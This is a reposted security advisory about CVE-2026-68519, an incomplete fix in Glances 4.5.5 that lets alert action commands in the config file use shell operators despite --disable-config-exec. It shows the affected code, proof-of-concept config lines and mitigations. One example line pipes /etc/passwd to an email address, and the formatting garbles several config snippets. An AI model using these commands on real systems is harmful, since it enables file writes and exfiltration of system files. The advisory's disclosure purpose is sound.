Glances, OS Command Injection (Incomplete Fix), CVE-2026-68519 (High) -DC-Aug2026-1530

Listen to this Post

In Glances 4.5.5, the `–disable-config-exec` flag was extended (GHSA-3vwc-qwhc-3mj7) to stop `secure_popen()` from interpreting the shell operators &&, |, and `>` in AMP command values taken from the configuration file. The hardening was not applied to the on-alert action command path, which reads its command lines from the same configuration file.
As a result, with `–disable-config-exec` enabled, a configured alert action that contains `>` (file redirection), `&&` (chaining), or `|` (pipe) still has those operators interpreted, allowing arbitrary file write / command chaining at the privilege of the glances process when the alert triggers.

Affected code – `glances/actions.py` (Glances 4.5.5):

ret = secure_popen(cmd_full) line 111 — no allow_operators=, defaults to True

By contrast the AMP modules were fixed:

glances/amps/default/<strong>init</strong>.py:69
self.set_result(secure_popen(res, allow_operators=self.allow_operators()).rstrip())
glances/amps/systemv/<strong>init</strong>.py:60
res = secure_popen(self.get('service_cmd'), allow_operators=self.allow_operators())

PoC (benign) – `glances.conf`:

[bash]
user_critical=1
user_critical_action=echo MARKER > /tmp/poc_marker

Run `glances –disable-config-exec` and generate CPU load. When the CPU user alert reaches CRITICAL, `/tmp/poc_marker` is created — i.e. the `>` operator was interpreted despite --disable-config-exec. The same `>` in an `

` command value is correctly not interpreted.
Impact – Arbitrary file write (<code>></code>), command chaining (<code>&&</code>), and pipe (<code>|</code>) from config-defined alert actions, contrary to the guarantee of <code>--disable-config-exec</code>. Trust boundary = the Glances configuration file.
Suggested fix – Pass `allow_operators=not args.disable_config_exec` from `GlancesActions.run()` into `secure_popen()` (GlancesActions already holds <code>args</code>).

<h2 style="color: blue;">Credit – Reported via responsible-disclosure incomplete-fix measurement study.</h2>

<h2 style="color: blue;">DailyCVE Form:</h2>

Platform: Glances
Version: 4.5.5 and earlier
Vulnerability: OS Command Injection (CWE-78)
Severity: HIGH (CVSS 4.0: 7.1)
Date: 2026-08-17

<h2 style="color: blue;">Prediction: Patch expected in 4.5.6 (already released)</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

[bash]
Check Glances version
glances --version
Verify --disable-config-exec flag behavior with alert action
Create malicious config
cat > glances.conf << EOF
[bash]
user_critical=1
user_critical_action=echo pwned > /tmp/glances_poc
EOF
Run with disable-config-exec
glances --disable-config-exec --config glances.conf
Trigger CPU alert and check file creation
ls -la /tmp/glances_poc
Command chaining PoC
user_critical_action=echo test && id > /tmp/chain
Pipe operator PoC
user_critical_action=cat /etc/passwd | mail [email protected]
Check affected code location
grep -n "secure_popen" glances/actions.py
Verify AMP modules are fixed
grep -n "allow_operators" glances/amps//<strong>init</strong>.py

Exploit: (Educational Purposes!)

  1. Modify `glances.conf` – Add or modify an alert action under any monitoring section (e.g.,
    </code>, <code>[bash]</code>, <code>[bash]</code>):
    [bash]
    [bash]
    user_critical=1
    user_critical_action=malicious_command > /path/to/file
    
  2. Run Glances with `--disable-config-exec` – The flag is supposed to block shell operators but fails for alert actions.
  3. Trigger the alert – Generate system load or memory pressure to reach the CRITICAL threshold.
  4. Observe execution – The command executes with the privileges of the Glances process, allowing:

- Arbitrary file write via `>`
- Command chaining via `&&`
- Output piping via `|`

Protection:

  • Upgrade to Glances 4.5.6 or later – This version fixes the issue by ensuring `GlancesActions.run()` respects `--disable-config-exec`
    - Restrict write permissions on `glances.conf` – Ensure only trusted administrators can modify the configuration file
  • Avoid configuring alert actions that include shell operators (>, &&, |) until upgrade
  • Disable alert actions if possible while awaiting upgrade
  • Run Glances with least privilege – Minimize the impact of potential command execution

Impact:

  • Arbitrary File Write – Attackers can write arbitrary content to any filesystem path accessible by the Glances process
  • Command Chaining – Multiple commands can be executed sequentially via `&&`
    - Command Piping – Output can be piped to arbitrary programs via `|`
    - Privilege Escalation – Commands execute with the privileges of the Glances process
  • Trust Boundary Violation – The `--disable-config-exec` guarantee is broken for alert actions
  • Configuration File as Attack Vector – Any attacker who can modify `glances.conf` can exploit this vulnerability

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top